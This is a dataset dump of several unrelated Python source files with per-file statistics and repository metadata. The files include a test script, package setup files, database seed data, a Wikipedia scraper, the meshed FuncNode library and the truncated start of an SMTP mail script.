assert test_menu[u'2'][KEY_ITEM_NAME] == u'海帶王子麵套餐', "name is not correct for item id 2"
assert test_menu[u'2'][KEY_ITEM_PRICE] == u'40', "price is not correct for item id 2"
assert test_menu[u'2'][KEY_ITEM_CATEGORY] == u'', "cateogry is not correct for item id 2"
mc_menu = get_menu(u'0')
assert mc_menu is not None, "Cannot find mcdonald's menu"
print "Can get Mcdonald's menu."
print "Test pass"
if __name__ == "__main__":
test()
| 33.838095 | 96 | 0.636927 | 603 | 3,553 | 3.527363 | 0.155887 | 0.072402 | 0.105313 | 0.105783 | 0.4189 | 0.403385 | 0.362953 | 0.32111 | 0.32111 | 0.311707 | 0 | 0.019586 | 0.23839 | 3,553 | 104 | 97 | 34.163462 | 0.766445 | 0.005911 | 0 | 0.027027 | 0 | 0 | 0.247959 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 0 | null | null | 0.013514 | 0.067568 | null | null | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a33919cebae58f61cf9d253999806d3447decc00 | 1,168 | py | Python | supervised_learning/__init__.py | liewmanchoi/NaiveMLA | fea7d6ce9650fb5ff7e31140fd584792dd0d7a2a | [
"MIT"
] | 1 | 2018-10-11T12:44:09.000Z | 2018-10-11T12:44:09.000Z | supervised_learning/__init__.py | liewmanchoi/NaiveMLA | fea7d6ce9650fb5ff7e31140fd584792dd0d7a2a | [
"MIT"
] | null | null | null | supervised_learning/__init__.py | liewmanchoi/NaiveMLA | fea7d6ce9650fb5ff7e31140fd584792dd0d7a2a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# __author__ = wangsheng
# __copyright__ = "Copyright 2018, Trump Organization"
# __email__ = "liewmanchoi@gmail.com"
# __status__ = "experiment"
# __time__ = 2018/11/8 11:15
# __file__ = __init__.py.py
from .knearestneighbor import KNN
from .linear_model import Ridge, Lasso, ElasticNet, LogisticRegression
from .naivebayes import GaussianNB
from .decisiontree import DecisionTreeClassifier
from .decisiontree import DecisionTreeRegressor
from .RandomForest import RandomForestClassifier
from .RandomForest import RandomForestRegressor
from .gradientboosting import GradientBoostingClassifier
from .gradientboosting import GradientBoostingRegressor
from .xgboost import XGBRegressor
from .xgboost import XGBClassifier
__all__ = ['KNN',
'Ridge',
'Lasso',
'ElasticNet',
'LogisticRegression',
'GaussianNB',
'DecisionTreeClassifier',
'RandomForestClassifier',
'DecisionTreeRegressor',
'RandomForestRegressor',
'GradientBoostingClassifier',
'GradientBoostingRegressor',
'XGBClassifier',
'XGBRegressor']
| 33.371429 | 70 | 0.714041 | 89 | 1,168 | 9 | 0.516854 | 0.024969 | 0.049938 | 0.094881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01726 | 0.206336 | 1,168 | 34 | 71 | 34.352941 | 0.846818 | 0.181507 | 0 | 0 | 0 | 0 | 0.224684 | 0.144515 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.44 | 0 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a340058a1e3554d3cddefc9a7ed2130183eca2f5 | 2,362 | py | Python | alembic/dev_seeds.py | ryanmahan/police-data-trust | e001e699adbc416f26a4f8fa64d56a1ef17e76fb | [
"MIT"
] | null | null | null | alembic/dev_seeds.py | ryanmahan/police-data-trust | e001e699adbc416f26a4f8fa64d56a1ef17e76fb | [
"MIT"
] | 2 | 2021-09-27T20:50:09.000Z | 2021-10-11T17:23:42.000Z | alembic/dev_seeds.py | ryanmahan/police-data-trust | e001e699adbc416f26a4f8fa64d56a1ef17e76fb | [
"MIT"
] | null | null | null | from backend.database.core import db
from backend.database import User, UserRole
from backend.auth import user_manager
from backend.database.models.incident import Incident
from backend.database.models.officer import Officer
from backend.database.models.use_of_force import UseOfForce
def create_user(user):
    """Persist *user* via its ``create()`` method unless an account with the
    same email address is already stored in the database."""
    existing = db.session.query(User).filter_by(email=user.email).first()
    if existing is None:
        user.create()
# Seed one development user per role; all accounts share the password "password".
create_user(
    User(
        email="test@example.com",
        password=user_manager.hash_password("password"),
        role=UserRole.PUBLIC,
        first_name="Test",
        last_name="Example",
    )
)
create_user(
    User(
        email="contributor@example.com",
        password=user_manager.hash_password("password"),
        role=UserRole.CONTRIBUTOR,
        first_name="Contributor",
        last_name="Example",
    )
)
create_user(
    User(
        email="admin@example.com",
        password=user_manager.hash_password("password"),
        role=UserRole.ADMIN,
        first_name="Admin",
        last_name="Example",
    )
)
create_user(
    User(
        email="passport@example.com",
        password=user_manager.hash_password("password"),
        role=UserRole.PASSPORT,
        first_name="Passport",
        last_name="Example",
    )
)
def create_incident(key=1, date="10-01-2019"):
    """Seed one test ``Incident`` (id = 10000000 + key) if not already present.

    :param key: small integer used to derive the incident id and test values
    :param date: date string (MM-DD-YYYY) used to build ``time_of_incident``
    """
    incident_id = 10000000 + key
    incident = Incident(
        id=incident_id,
        location=f"Test location {key}",
        description=f"Test description {key}",
        department=f"Small Police Department {key}",
        time_of_incident=f"{date} 00:00:00",
        officers=[
            Officer(
                first_name=f"TestFirstName {key}",
                last_name=f"TestLastName {key}",
            )
        ],
        use_of_force=[UseOfForce(item=f"gunshot {key}")],
        source="mpv",
    )
    already_seeded = (
        db.session.query(Incident).filter_by(id=incident_id).first() is not None
    )
    if not already_seeded:
        incident.create()
# Seed a spread of incidents across 2019-2020 so date-range queries have data.
create_incident(key=1, date="10-01-2019")
create_incident(key=2, date="11-01-2019")
create_incident(key=3, date="12-01-2019")
create_incident(key=4, date="03-15-2020")
create_incident(key=5, date="04-15-2020")
create_incident(key=6, date="08-10-2020")
create_incident(key=7, date="10-01-2020")
create_incident(key=8, date="10-15-2020")
| 25.956044 | 78 | 0.641829 | 302 | 2,362 | 4.870861 | 0.264901 | 0.085656 | 0.104011 | 0.051666 | 0.375935 | 0.301835 | 0.276003 | 0.206662 | 0.165874 | 0.165874 | 0 | 0.051941 | 0.225656 | 2,362 | 90 | 79 | 26.244444 | 0.752324 | 0 | 0 | 0.207792 | 0 | 0 | 0.165961 | 0.009738 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0.090909 | 0.077922 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a340830aa520f9d002052b88e1e07edea29544ea | 698 | py | Python | allencv/tests/models/basic_classifier_test.py | sethah/allencv | 1bdc27359f81290e96b290ccda11f7a9905ebf14 | [
"Apache-2.0"
] | 8 | 2019-05-09T02:48:54.000Z | 2022-02-14T03:58:54.000Z | allencv/tests/models/basic_classifier_test.py | sethah/allencv | 1bdc27359f81290e96b290ccda11f7a9905ebf14 | [
"Apache-2.0"
] | null | null | null | allencv/tests/models/basic_classifier_test.py | sethah/allencv | 1bdc27359f81290e96b290ccda11f7a9905ebf14 | [
"Apache-2.0"
] | null | null | null | from allencv.common.testing import AllenCvTestCase, ModelTestCase
from allencv.data.dataset_readers import ImageClassificationDirectory
from allencv.models import BasicImageClassifier
from allencv.modules.im2im_encoders import FeedforwardEncoder
from allencv.modules.im2vec_encoders import FlattenEncoder
class TestBasicImageClassifier(ModelTestCase):
    # Smoke test for BasicImageClassifier: builds the model from the fixture
    # experiment config and exercises ModelTestCase's train/save/load check.
    def test_basic_experiment(self):
        # Fixture dataset used by the experiment config's dataset reader.
        data_directory = AllenCvTestCase.FIXTURES_ROOT / "data" / "image_classification"
        self.set_up_model(AllenCvTestCase.FIXTURES_ROOT / 'basic_image_classifier' / 'experiment.jsonnet',
                          data_directory)
        # NOTE(review): ensure_model_can_train_save_and_load is provided by
        # ModelTestCase (not visible here) — presumably trains briefly, then
        # round-trips the model through save/load; confirm in that base class.
        self.ensure_model_can_train_save_and_load(self.param_file)
| 43.625 | 106 | 0.803725 | 74 | 698 | 7.297297 | 0.594595 | 0.101852 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003328 | 0.138968 | 698 | 15 | 107 | 46.533333 | 0.895175 | 0 | 0 | 0 | 0 | 0 | 0.091822 | 0.031564 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a345e0e78b5623bed10fd1877afa16414a66afdb | 756 | py | Python | dashboard/plant_care/wikipedia_scraper.py | LSaldyt/plantsitter | 6d983b1596c7b2ddaea55f25067516579f542c14 | [
"MIT"
] | 1 | 2021-11-04T19:16:51.000Z | 2021-11-04T19:16:51.000Z | dashboard/plant_care/wikipedia_scraper.py | LSaldyt/plantsitter | 6d983b1596c7b2ddaea55f25067516579f542c14 | [
"MIT"
] | null | null | null | dashboard/plant_care/wikipedia_scraper.py | LSaldyt/plantsitter | 6d983b1596c7b2ddaea55f25067516579f542c14 | [
"MIT"
] | null | null | null | import wikipedia
from pprint import pprint
import json, os
class WikipediaScraper:
    """Look up a search term on Wikipedia and return its title and summary."""

    def __init__(self):
        pass

    def get(self, term):
        """Return ``{'title': ..., 'summary': ...}`` for the best Wikipedia match.

        :param term: plant name (or any search term) to look up
        :raises RuntimeError: when the search returns no results at all
        :return: dict with ``title`` and ``summary`` keys; on a
            ``DisambiguationError`` a fallback dict is returned instead of raising
        """
        try:
            results = wikipedia.search(term)
            # Idiomatic emptiness check (was: len(results) == 0).
            if not results:
                raise RuntimeError(f'No wikipedia page for: {term}')
            # auto_suggest=False: take the top search hit verbatim, without
            # wikipedia's sometimes-surprising spelling "corrections".
            best_page = wikipedia.page(results[0], auto_suggest=False)
            return dict(title=best_page.title, summary=best_page.summary)
        except wikipedia.DisambiguationError:
            # Exception details are not needed (previously bound to an unused 'e').
            return dict(title=term, summary='No summary could be found as the plant name is ambiguous. Try supplying a more specific plant name, such as "Peppermint" instead of "Mint", or even the latin name, "Mentha piperita," to improve results.')
| 37.8 | 249 | 0.666667 | 99 | 756 | 5.010101 | 0.626263 | 0.048387 | 0.060484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003534 | 0.251323 | 756 | 19 | 250 | 39.789474 | 0.872792 | 0 | 0 | 0 | 0 | 0.066667 | 0.30596 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0.066667 | 0.2 | 0 | 0.533333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a34963807f9efa829d675f7d41262cfc10b905a5 | 1,138 | py | Python | setup.py | aroden-crowdstrike/eamcsv2json | 17f096b60e7cf2a2406ae61b877f7bec6fe9a7ff | [
"BSD-3-Clause"
] | null | null | null | setup.py | aroden-crowdstrike/eamcsv2json | 17f096b60e7cf2a2406ae61b877f7bec6fe9a7ff | [
"BSD-3-Clause"
] | null | null | null | setup.py | aroden-crowdstrike/eamcsv2json | 17f096b60e7cf2a2406ae61b877f7bec6fe9a7ff | [
"BSD-3-Clause"
] | null | null | null | from setuptools import find_packages, setup
setup(
    name='eamcsv2json',
    description='Converts EAM CSV export to JSON',
    long_description=open('README.md').read(),
    author='Andrew Roden',
    author_email='andrew.roden@crowdstrike.com',
    url='https://github.com/crowdstrike/eamcsv2json',
    # find_packages needs both the parent ('tests') and its children
    # ('tests.*') patterns to exclude the whole test tree.
    packages=find_packages(exclude=['tests', 'tests.*']),
    # Include non-Python files tracked by version control in the distribution.
    include_package_data=True,
    setup_requires=[
        'setuptools_scm',
        'wheel',
    ],
    license="BSD",
    keywords='',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
    # Installable CLI: `eamcsv2json` invokes eamcsv2json/__main__.py:main.
    entry_points={
        'console_scripts': [
            'eamcsv2json = eamcsv2json.__main__:main',
        ]
    },
    # Derive the package version from git tags via setuptools_scm.
    use_scm_version=True,
)
| 30.756757 | 57 | 0.614236 | 116 | 1,138 | 5.887931 | 0.672414 | 0.111274 | 0.146413 | 0.114202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015205 | 0.248682 | 1,138 | 36 | 58 | 31.611111 | 0.783626 | 0.067663 | 0 | 0.060606 | 0 | 0 | 0.47259 | 0.050095 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.030303 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a350ea2475c9dc5ad3730d2b63c362bf970ae493 | 19,168 | py | Python | meshed/base.py | sylvainbonnot/meshed | 6cd266810924480995d3a798e696ef7911dcf9b4 | [
"MIT"
] | null | null | null | meshed/base.py | sylvainbonnot/meshed | 6cd266810924480995d3a798e696ef7911dcf9b4 | [
"MIT"
] | null | null | null | meshed/base.py | sylvainbonnot/meshed | 6cd266810924480995d3a798e696ef7911dcf9b4 | [
"MIT"
] | null | null | null | """
Base functionality of meshed
"""
from collections import Counter
from dataclasses import dataclass, field
from functools import partial
from typing import Callable, MutableMapping, Iterable, Union, Sized, Sequence
from i2 import Sig, call_somewhat_forgivingly
from meshed.util import ValidationError, NameValidationError, mk_func_name
from meshed.itools import add_edge
def underscore_func_node_names_maker(func: Callable, name=None, out=None):
    """Resolve a ``FuncNode``'s (name, out) pair.

    Resolution order:

    #. if both ``name`` and ``out`` are given, use them as-is;
    #. otherwise derive a base name with ``mk_func_name(func)`` and fill in the
       missing value(s), suffixing/prefixing an underscore so that a function's
       output can share the function's name: this eases building networks where
       one function's output feeds another's same-named input argument.
    """
    if name is not None and out is not None:
        return name, out
    try:
        func_name = mk_func_name(func)
    except NameValidationError as err:
        message = err.args[0] + (
            f'\nSuggestion: You might want to specify a name explicitly in '
            f'FuncNode(func, name=name) instead of just giving me the func as is.'
        )
        raise NameValidationError(message)
    if name is None and out is None:
        return func_name + '_', func_name
    if out is None:
        return name, '_' + name
    return func_name, out
def basic_node_validator(func_node):
    """Validate a func node, raising ``ValidationError`` on any problem.

    Checks, in order:

    * the constructor arguments are of valid types (callable/str/dict[str, str]);
    * every name (``.name``, ``.out``, all ``.bind.values()``) is a string;
    * no name is repeated;
    * every name is a valid python identifier;
    * every ``.bind`` key is an actual parameter of ``.func``.

    Returns ``None`` when everything is fine.
    """
    _func_node_args_validation(
        func=func_node.func, name=func_node.name, bind=func_node.bind, out=func_node.out
    )
    names = [func_node.name, func_node.out] + list(func_node.bind.values())

    non_string_names = [n for n in names if not isinstance(n, str)]
    if non_string_names:
        non_string_names = ', '.join(map(str, non_string_names))
        raise ValidationError(f'Should be strings: {non_string_names}')

    # No duplicates allowed among any of the names.
    _duplicates = duplicates(names)
    if _duplicates:
        raise ValidationError(f'{func_node} has duplicate names: {_duplicates}')

    # All names must be valid python identifiers.
    _non_identifiers = [n for n in names if not n.isidentifier()]
    if _non_identifiers:
        raise ValidationError(f'{func_node} non-identifier names: {_non_identifiers}')

    # Every bind key must exist as a parameter of the wrapped function.
    bind_names_not_in_sig_names = func_node.bind.keys() - func_node.sig.names
    assert not bind_names_not_in_sig_names, (
        f"some bind keys weren't found as function argnames: "
        f"{', '.join(bind_names_not_in_sig_names)}"
    )
# TODO: Think of the hash more carefully (see _hash_str below).
@dataclass
class FuncNode:
    """A function wrapper that makes the function amenable to operating in a network.

    :param func: Function to wrap
    :param name: The name to associate to the function
    :param bind: The {func_argname: external_name, ...} mapping that defines where
        the node will source the data to call the function.
        This only has to be used if the external names are different from the names
        of the arguments of the function.
    :param out: The variable name the function should write its result to

    A ``FuncNode`` encodes an ``output = function(...inputs...)`` assignment
    statement in a way that can be carried out on a *scope* -- a mutable mapping
    in which the function finds its input values and writes its output value.

    >>> def multiply(x, y):
    ...     return x * y
    >>> func_node = FuncNode(
    ...     func=multiply,
    ...     bind={'x': 'item_price', 'y': 'num_of_items'})
    >>> func_node
    FuncNode(item_price,num_of_items -> multiply_ -> multiply)

    Note that ``bind`` maps **from** the wrapped function's argument names **to**
    the names in the scope; any argument absent from ``bind`` is sourced from the
    scope under its own (function-internal) name.

    >>> scope = {'item_price': 3.5, 'num_of_items': 2}
    >>> func_node(scope)  # returns the result...
    7.0
    >>> scope  # ...and also writes it into the scope under `out`
    {'item_price': 3.5, 'num_of_items': 2, 'multiply': 7.0}

    If ``name``/``out`` are not given, they are derived from the function's name
    (see ``underscore_func_node_names_maker`` for the exact rules):

    >>> FuncNode(multiply, name='total_price', out='daily_expense')
    FuncNode(x,y -> total_price -> daily_expense)
    >>> FuncNode(multiply, out='daily_expense')
    FuncNode(x,y -> multiply -> daily_expense)
    >>> FuncNode(multiply, name='total_price')
    FuncNode(x,y -> total_price -> _total_price)

    Note: in a network, reusing the same function (say, ``multiply``) in several
    places requires giving each node a distinct custom name, since nodes are
    identified by name.
    """

    func: Callable
    name: str = field(default=None)
    bind: dict = field(default_factory=dict)
    out: str = field(default=None)
    func_label: str = field(default=None)  # TODO: Integrate more
    write_output_into_scope: bool = True  # TODO: Do we really want to allow False?
    names_maker: Callable = underscore_func_node_names_maker
    node_validator: Callable = basic_node_validator

    def __post_init__(self):
        _func_node_args_validation(func=self.func, name=self.name, out=self.out)
        # Fill in missing name/out from the function's own name.
        self.name, self.out = self.names_maker(self.func, self.name, self.out)
        self.__name__ = self.name
        # The wrapped function's signature will be useful
        # when interfacing with it and the scope.
        self.sig = Sig(self.func)
        # replace integer bind keys with their corresponding name
        self.bind = _bind_where_int_keys_repl_with_argname(self.bind, self.sig.names)
        # complete bind with the argnames of the signature
        _complete_dict_with_iterable_of_required_keys(self.bind, self.sig.names)
        _func_node_args_validation(bind=self.bind)
        # extractor(scope) yields the (argname, value) pairs this node needs.
        self.extractor = partial(_mapped_extraction, to_extract=self.bind)
        if self.func_label is None:
            self.func_label = self.name
        self.node_validator(self)

    def synopsis_string(self):
        """One-line summary of the node: ``'inputs -> name -> out'``."""
        return f"{','.join(self.bind.values())} -> {self.name} " f'-> {self.out}'

    def __repr__(self):
        return f'FuncNode({self.synopsis_string()})'

    def call_on_scope(self, scope: MutableMapping):
        """Call the function using the given scope both to source arguments and write
        results.

        Note: This method is only meant to be used as a backend to __call__, not as
        an actual interface method. Additional control/constraints on read and writes
        can be implemented by providing a custom scope for that."""
        relevant_kwargs = dict(self.extractor(scope))
        args, kwargs = self.sig.args_and_kwargs_from_kwargs(relevant_kwargs)
        output = call_somewhat_forgivingly(
            self.func, args, kwargs, enforce_sig=self.sig
        )
        if self.write_output_into_scope:
            scope[self.out] = output
        return output

    def _hash_str(self):
        """Design idea: a string reflecting the identity we actually want to hash.

        Only identifier characters (alphanumerics and underscore) and separators
        appear here, so it could later be encoded as an int (for __hash__) in a
        reverse-decodable way with a reasonable int size.
        """
        return ';'.join(self.bind) + '::' + self.out

    # TODO: Find a better one
    def __hash__(self):
        return hash(self._hash_str())

    def __call__(self, scope):
        """Deprecated: Don't use. Might be a normal function with a signature"""
        return self.call_on_scope(scope)

    @classmethod
    def has_as_instance(cls, obj):
        """Verify if ``obj`` is an instance of a FuncNode (or specific sub-class).

        The usefulness of this method is to not have to make a lambda with isinstance
        when filtering.

        >>> FuncNode.has_as_instance(FuncNode(lambda x: x))
        True
        >>> FuncNode.has_as_instance("I am not a FuncNode: I'm a string")
        False
        """
        return isinstance(obj, cls)
def validate_that_func_node_names_are_sane(func_nodes: Iterable[FuncNode]):
    """Assert that the names of func_nodes are sane.

    That is:

    * all ``.name`` and ``.out`` values are valid dot (graphviz) names
      (``str.isidentifier`` is used as a convenient proxy);
    * the collection of ``.name`` and ``.out`` values contains no repeats;
    * more to come (TODO)...
    """
    func_nodes = list(func_nodes)
    node_names = [fn.name for fn in func_nodes]
    outs = [fn.out for fn in func_nodes]
    assert all(
        name.isidentifier() for name in node_names
    ), f"some node names weren't valid identifiers: {node_names}"
    assert all(
        out.isidentifier() for out in outs
    ), f"some return names weren't valid identifiers: {outs}"
    # Each node contributes two names; any collision shrinks the union below 2n.
    if len(set(node_names) | set(outs)) != 2 * len(func_nodes):
        counts = Counter(node_names + outs)
        offending_names = [name for name, count in counts.items() if count > 1]
        raise ValueError(
            f'Some of your node names and/or outs where used more than once. '
            f"They shouldn't. These are the names I find offensive: {offending_names}"
        )
def _mk_func_nodes(func_nodes):
    """Yield every item as a ``FuncNode``, wrapping plain callables on the fly."""
    # TODO: Take care of names (or track and take care if collision)
    for item in func_nodes:
        if is_func_node(item):
            yield item
        elif isinstance(item, Callable):
            yield FuncNode(item)
        else:
            raise TypeError(f"Can't convert this to a FuncNode: {item}")
def _func_nodes_to_graph_dict(func_nodes):
    """Build an adjacency dict linking source names -> func nodes -> out names."""
    graph = {}
    for func_node in func_nodes:
        # Each bound (external) input name feeds this node...
        for src_name in func_node.bind.values():
            add_edge(graph, src_name, func_node)
        # ...and the node feeds its output name.
        add_edge(graph, func_node, func_node.out)
    return graph
def is_func_node(obj) -> bool:
    """
    >>> is_func_node(FuncNode(lambda x: x))
    True
    >>> is_func_node("I am not a FuncNode: I'm a string")
    False
    """
    # Deliberately weaker than isinstance(obj, FuncNode): while FuncNode is being
    # redefined during development (without relaunching the python kernel),
    # isinstance fails on instances of the stale class, whereas checking class
    # names in the MRO keeps working.
    # TODO: Replace with isinstance(obj, FuncNode) once development stabilizes.
    obj_class = type(obj)
    if obj_class is type:
        # obj is itself a class, not an instance.
        return False
    return any(
        getattr(klass, '__name__', '') == 'FuncNode' for klass in obj_class.mro()
    )
def is_not_func_node(obj) -> bool:
    """
    >>> is_not_func_node(FuncNode(lambda x: x))
    False
    >>> is_not_func_node("I am not a FuncNode: I'm a string")
    True
    """
    # Use the same reload-tolerant check as is_func_node so the two predicates
    # can never disagree. (FuncNode.has_as_instance relies on isinstance, which
    # fails for instances of a stale FuncNode class during development -- the
    # very situation is_func_node was written to handle.)
    return not is_func_node(obj)
def get_init_params_of_instance(obj):
    """Return the attributes of ``obj`` that are also parameters of the
    ``__init__`` of its class, as a ``{name: value}`` dict."""
    # Compute the signature once, not once per attribute (the original rebuilt
    # Sig(type(obj)) inside the comprehension condition on every iteration).
    init_param_names = Sig(type(obj)).names
    return {k: v for k, v in vars(obj).items() if k in init_param_names}
def ch_func_node_attrs(fn, **new_attrs_values):
    """Returns a copy of the func node with some of its attributes changed

    >>> def plus(a, b):
    ...     return a + b
    ...
    >>> def minus(a, b):
    ...     return a - b
    ...
    >>> fn = FuncNode(func=plus, out='sum')
    >>> fn.func == plus
    True
    >>> fn.name == 'plus'
    True
    >>> new_fn = ch_func_node_attrs(fn, func=minus)
    >>> new_fn.func == minus
    True
    >>> new_fn.synopsis_string() == 'a,b -> plus -> sum'
    True
    >>> newer_fn = ch_func_node_attrs(fn, func=minus, name='sub', out='difference')
    >>> newer_fn.synopsis_string() == 'a,b -> sub -> difference'
    True
    """
    init_params = get_init_params_of_instance(fn)
    # Reject attribute names that FuncNode's constructor does not accept.
    unknown_params = new_attrs_values.keys() - init_params
    if unknown_params:
        raise ValueError(
            f'These are not params of {type(fn).__name__}: '
            f'{unknown_params}'
        )
    return FuncNode(**dict(init_params, **new_attrs_values))
def _keys_and_values_are_strings_validation(d: dict):
for k, v in d.items():
if not isinstance(k, str):
raise ValidationError(f'Should be a str: {k}')
if not isinstance(v, str):
raise ValidationError(f'Should be a str: {v}')
def _func_node_args_validation(
*, func: Callable = None, name: str = None, bind: dict = None, out: str = None
):
"""Validates the four first arguments that are used to make a ``FuncNode``.
Namely, if not ``None``,
* ``func`` should be a callable
* ``name`` and ``out`` should be ``str``
* ``bind`` should be a ``Dict[str, str]``, ``Dict[int, str]`` or ``List[str]``
* ``out`` should be a str
"""
if func is not None and not isinstance(func, Callable):
raise ValidationError(f'Should be callable: {func}')
if name is not None and not isinstance(name, str):
raise ValidationError(f'Should be a str: {name}')
if bind is not None:
if not isinstance(bind, dict):
raise ValidationError(f'Should be a dict: {bind}')
_keys_and_values_are_strings_validation(bind)
if out is not None and not isinstance(out, str):
raise ValidationError(f'Should be a str: {out}')
def _old_mapped_extraction(extract_from: dict, key_map: dict):
"""Deprecated: Old version of _mapped_extraction.
for every (k, v) of key_map whose v is a key of extract_from, yields
(v, extract_from[v])
Meant to be curried into an extractor, and wrapped in dict.
>>> extracted = _old_mapped_extraction(
... {'a': 1, 'b': 2, 'c': 3}, # extract_from
... {'A': 'a', 'C': 'c', 'D': 'd'} # note that there's no 'd' in extract_from
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for k, v in key_map.items():
if v in extract_from:
yield v, extract_from[v]
def _mapped_extraction(src: dict, to_extract: dict):
"""for every (desired_name, src_name) of to_extract whose v is a key of source,
yields (desired_name, source[src_name])
It's purpose is to extract inputs from a src.
The names used in the src may be different from those desired by the function,
those to_extract specifies what to extract by a {desired_name: src_name, ...}
map.
_mapped_extraction_ is mant to be curried into an extractor.
>>> extracted = _mapped_extraction(
... src={'A': 1, 'B': 2, 'C': 3},
... to_extract={'a': 'A', 'c': 'C', 'd': 'D'} # note that there's no 'd' here
... )
>>> dict(extracted)
{'a': 1, 'c': 3}
"""
for desired_name, src_name in to_extract.items():
if src_name in src:
yield desired_name, src[src_name]
def duplicates(elements: Union[Iterable, Sized]):
    """Return the elements that occur more than once (in first-seen order),
    or an empty list when every element is unique."""
    counts = Counter(elements)
    if len(counts) == len(elements):
        return []
    return [element for element, count in counts.items() if count > 1]
def _bind_where_int_keys_repl_with_argname(bind: dict, names: Sequence[str]) -> dict:
"""
:param bind: A bind dict, as used in FuncNode
:param names: A sequence of strings
:return: A bind dict where integer keys were replaced with the corresponding
name from names.
>>> bind = {0: 'a', 1: 'b', 'c': 'x', 'd': 'y'}
>>> names = 'e f g h'.split()
>>> _bind_where_int_keys_repl_with_argname(bind, names)
{'e': 'a', 'f': 'b', 'c': 'x', 'd': 'y'}
"""
def transformed_items():
for k, v in bind.items():
if isinstance(k, int):
argname = names[k]
yield argname, v
else:
yield k, v
return dict(transformed_items())
def _complete_dict_with_iterable_of_required_keys(
to_complete: dict, complete_with: Iterable
):
"""Complete `to_complete` (in place) with `complete_with`
`complete_with` contains values that must be covered by `to_complete`
Those values that are not covered will be inserted in to_complete,
with key=val
>>> d = {'a': 'A', 'c': 'C'}
>>> _complete_dict_with_iterable_of_required_keys(d, 'abc')
>>> d
{'a': 'A', 'c': 'C', 'b': 'b'}
"""
keys_already_covered = set(to_complete)
for required_key in complete_with:
if required_key not in keys_already_covered:
to_complete[required_key] = required_key
| 36.441065 | 94 | 0.653537 | 2,828 | 19,168 | 4.263791 | 0.165488 | 0.027202 | 0.007464 | 0.015674 | 0.22682 | 0.145961 | 0.085503 | 0.064356 | 0.034002 | 0.029524 | 0 | 0.002203 | 0.242227 | 19,168 | 525 | 95 | 36.510476 | 0.827952 | 0.506782 | 0 | 0.05291 | 0 | 0 | 0.115099 | 0.018948 | 0 | 0 | 0 | 0.011429 | 0.015873 | 1 | 0.132275 | false | 0 | 0.037037 | 0.015873 | 0.322751 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a351abdfff69d885b5a22be4fa59283c80a7b781 | 1,363 | py | Python | python/code/mail/smtpplugin.py | hgfgood/note | f89febca3ce925cba4cd4c8068a4fa124f23c810 | [
"Apache-2.0"
] | null | null | null | python/code/mail/smtpplugin.py | hgfgood/note | f89febca3ce925cba4cd4c8068a4fa124f23c810 | [
"Apache-2.0"
] | null | null | null | python/code/mail/smtpplugin.py | hgfgood/note | f89febca3ce925cba4cd4c8068a4fa124f23c810 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/python
# coding:utf-8
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
from email.mime.text import MIMEText
__author__ = 'hgf'
HOST = "smtp.qq.com"
SUBJECT = u"业务性能数据表"
FROM = "980673553@qq.com"
TO = "hgfgoodcreate@163.com"
def addimg(src, imgid):
